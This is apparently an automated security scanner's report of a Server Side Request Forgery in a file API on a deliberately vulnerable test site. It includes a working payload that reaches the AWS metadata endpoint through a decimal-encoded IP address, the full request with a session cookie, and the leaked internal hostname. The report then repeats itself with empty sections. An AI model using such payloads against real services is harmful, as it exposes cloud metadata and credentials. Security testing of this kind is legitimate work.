Server Side Request Forgery
Severity: High Discovered: 10 of October-2022, 11:12 PM
CWE ID
CWE-918
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Details
A Server Side Request Forgery (also known as SSRF) attack allows an attacker to read or update internal server resources.
SSRF occurred while injecting token "http://2852039166/latest/meta-data/local-hostname" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg
SSRF retrieved AWS metadata from internal resource "/latest/meta-data/local-hostname".
Possible exposure
Execute Unauthorized Code or Commands; Bypass Protection Mechanism; Read Application Data
Remediation suggestions
Whitelist DNS names or IP addresses that the application needs to access. Validate all user input. Never send raw server response body from the server to the client, always make sure to parse the respone first. Disable any unused schema i.e. ftp://, dict://, file:///, gopher://. Use authentication on all internal services.
Request
GET https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443550676; connect.sid=WakDBCc1ZpjPV8GmUMZUSPjeFIchbnbk.yi%2BPDU5Oh9XifqV%2FMuNOyzT9nH8MrfnqvB%2F%2B9BIO4f0
Accept-Encoding: identity
Metadata: true
Metadata-Flavor: Google
Accept: text/html
Response
HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:30 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443550891
Content-Length: 26
Cache-Control: public, max-age=99999
ip-10-0-0-200.ec2.internal
External links
Server Side Request Forgery
Severity:
HighDiscovered:10 of October-2022, 11:12 PMCWE ID
CWE-918
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
Details
A Server Side Request Forgery (also known as SSRF) attack allows an attacker to read or update internal server resources.
SSRF occurred while injecting token "http://2852039166/latest/meta-data/local-hostname" into parameter "" in the URL.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg
SSRF retrieved AWS metadata from internal resource "/latest/meta-data/local-hostname".
Possible exposure
Execute Unauthorized Code or Commands; Bypass Protection Mechanism; Read Application Data
Remediation suggestions
Whitelist DNS names or IP addresses that the application needs to access. Validate all user input. Never send raw server response body from the server to the client, always make sure to parse the respone first. Disable any unused schema i.e. ftp://, dict://, file:///, gopher://. Use authentication on all internal services.
Request
Response
External links